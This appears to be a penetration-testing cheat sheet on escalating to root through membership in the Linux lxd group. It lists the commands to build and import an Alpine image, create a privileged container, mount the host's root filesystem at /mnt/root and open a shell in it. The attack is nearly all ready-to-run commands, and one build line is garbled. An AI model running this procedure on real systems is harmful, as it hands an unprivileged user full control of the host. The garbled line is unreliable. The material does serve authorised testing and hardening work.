killchain-compendium/exploit/level3_hypervisor/lxc.md

LXC

Privilege Escalation

Member of lxd Group

• Hackingarticles article
• User has to be in lxd group, not necessarily sudo.

Usage

• Clone and build

git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builde && sudo && ./build alpine

• Upload to target
• Import alpine image

lxc image import ./alpine-v3.14-x86_64-20210920_2132.tar.gz --alias myimage

• Prepare image

lxc image list
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh

• Host / is mounted at /mnt/root inside the container
• root directory is at /mnt/root/root